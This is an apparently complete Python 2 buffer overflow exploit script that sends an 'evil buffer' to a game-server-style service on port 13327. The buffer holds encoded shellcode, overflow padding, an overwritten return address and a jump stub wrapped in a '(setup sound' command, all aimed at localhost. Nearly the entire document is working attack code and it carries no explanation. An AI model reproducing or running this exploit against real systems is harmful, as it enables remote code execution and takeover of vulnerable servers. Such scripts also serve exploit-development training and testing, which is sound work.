24 lines
893 B
Python
24 lines
893 B
Python
#!/usr/bin/python
|
|
import socket
|
|
host = "127.0.0.1"
|
|
shellcode = (
|
|
"\x6a\x15\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2\x83\xab"+
|
|
"\x2c\x83\xeb\xfc\xe2\xf4\xf3\x58\xf8\x6f\x91\xe9\xa9\x46\xa4\xdb"+
|
|
"\x32\xa5\x23\x4e\x2b\xba\x81\xd1\xcd\x44\xd3\xdf\xcd\x7f\x4b\x62"+
|
|
"\xc1\x4a\x9a\xd3\xfa\x7a\x4b\x62\x66\xac\x72\xe5\x7a\xcf\x0f\x03"+
|
|
"\xf9\x7e\x94\xc0\x22\xcd\x72\xe5\x66\xac\x51\xe9\xa9\x75\x72\xbc"+
|
|
"\x66\xac\x8b\xfa\x52\x9c\xc9\xd1\xc3\x03\xed\xf0\xc3\x44\xed\xe1"+
|
|
"\xc2\x42\x4b\x60\xf9\x7f\x4b\x62\x66\xac"
|
|
)
|
|
crash= shellcode + "\x41"*(4368-106) + '\x97\x45\x13\x08' + '\x83\xc0\x0c\xff\xe0\x90\x90'
|
|
#crash="\x41"*4368 + '\x42'*4 + '\x43'*7
|
|
buffer = "\x11(setup sound " +crash+ "\x90\x00#"
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
print "[*] Sending evil buffer..."
|
|
s.connect((host,13327))
|
|
data = s.recv(1024)
|
|
print data
|
|
s.send(buffer)
|
|
s.close()
|
|
print "[*] Payload Send"
|